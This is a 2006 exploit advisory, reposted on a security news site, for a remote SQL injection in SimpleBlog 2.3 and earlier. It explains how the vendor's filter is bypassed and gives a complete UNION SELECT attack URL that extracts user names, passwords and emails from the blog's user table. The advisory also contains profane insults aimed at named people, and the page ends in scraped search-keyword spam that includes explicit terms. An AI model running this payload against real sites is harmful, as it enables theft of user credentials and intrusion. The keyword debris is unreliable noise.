about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability




2006-09-04 SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability
Rated as : High Risk

                                           _           _        
                                    __   _(_)_ __  ___| |_ __ _ 
                                    \ \ / / | '_ \/ __| __/ _` |
                                     \ V /| | |_) \__ \ || (_| |
                                      \_/ |_| .__/|___/\__\__,_|
                                          |_| AnD
		                               _               _    _ _ _     
                       _ __ ___  _   _ _ __ __| | ___ _ __ ___| | _(_) |
|____
                      | '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | |
|_  /
                      | | | | | | |_| | | | (_| |  __/ |  \__ \   <| |
| |/ / 
                      |_| |_| |_|\__,_|_|  \__,_|\___|_| 
|___/_|\_\_|_|_/___|

 		+-----------------------------------------------------------------+
		| Vipsta & MurderSkillz fucking pwnt this webApp                  |
		+-----------------------------------------------------------------+
		| App Name: SimpleBlog 2.3 					  |
		| App Author: 8pixel.net					  |
		| App Version: <= 2.3 						  |
		| App Type: Blog/Journal					  |
		+-----------------------------------------------------------------+
		| DETAILS							  |
		+-----------------------------------------------------------------+
		| Vulnerability: Remote SQL Injection				  |
		| Requirements: Database with UNION support			  |
		| Revisions: Note - This is a revision of another vuln 	          |
		|	            posted by Chironex Fleckeri			  |
		+-----------------------------------------------------------------+
		| CODE								  |
		+-----------------------------------------------------------------+
		| Vendor "implemented" a fix for SQL injection
vulnerabilities.   |
		| however this bullshit was easily worked around by		  |
		| Vipsta & MurderSkillz.					  |
		|								  |
		| Vendor attempted to remove illegal characters like ' and =      |
		| which stop most SQL injection vulnerabilities. However:	  |
		| Vendor failed to remove '>' symbol.				  |
		+-----------------------------------------------------------------+
		| EXPLOIT							  |
		+-----------------------------------------------------------------+
		| SQL Injection String:						  |

+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
 |
http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1
 |

+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
 		| TIMELINE							  |
		+-----------------------------------------------------------------+
		| 9/2/06 - Vendor Notified.					  |
		| 9/2/06 - Vendor Replied. Threatens legal action.		  |
		| 9/4/06 - Exploit Released with no details to vendor.            |
		+-----------------------------------------------------------------+
		| SHOUTZ							  |
		+-----------------------------------------------------------------+
		| Everyone at g00ns.net - including:				  |
		| 	z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo,	  |
		|	TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot,	  |
		|	JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be,  |
		|	ReysRaged, milf <3, gio, RedCoat, and all who I forgot!   |
		+-----------------------------------------------------------------+
		| ADDITIONAL NOTES						  |
		+-----------------------------------------------------------------+
		| TeamSpeak: ts.g00ns.net					  |
		| IRC: irc.g00ns.net						  |
		+-----------------------------------------------------------------+
		| PERSONAL STUFF						  |
		+-----------------------------------------------------------------+
		| Sess from g00ns.net IS A FUCKING MORON.                         |
		+-----------------------------------------------------------------+

                                             __ 
                                  ___  ___  / _|
                                 / _ \/ _ \| |_ 
                                |  __/ (_) |  _|
                                 \___|\___/|_|.
securitydot.net - 2006-09-04

Advertising

Copyright 2007, SecurityDot
Thu, 03 Dec 2009 07:20:45 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
vp-asp sho www.522gg. www.gaoxiu sxe 2006-08 pri Hello, nic www.nepals ip proxy php-nuke 2 Remote Fil 100% hummibirds 10938 fucking pi index.php? php-nuke+2 jinrisf.co sexy com guest book Nametha se Www.mujere news for c archive /search/ex php-nuke 2 westell ve kissing vi +X+Windows WWW bugil ma ki localhost 12 yers video tuto anal seks 18yearolds news for c Nametha se Ocean all cartoo Nametha se www.jtwamm p..._conve Www.Hotsex Www.Sexjap www.woasf. Apache/1.3 200 /compo ?option=co /admin/cla